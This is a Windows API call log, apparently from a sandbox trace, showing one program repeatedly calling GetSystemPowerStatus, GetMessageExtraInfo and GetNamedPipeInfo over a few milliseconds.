	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.348] GetMessageExtraInfo () returned 0x0
	[0026.348] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.348] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.349] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.349] GetMessageExtraInfo () returned 0x0
	[0026.349] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.350] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.350] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.350] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.351] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.351] GetMessageExtraInfo () returned 0x0
	[0026.351] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.352] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.352] GetMessageExtraInfo () returned 0x0
	[0026.352] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
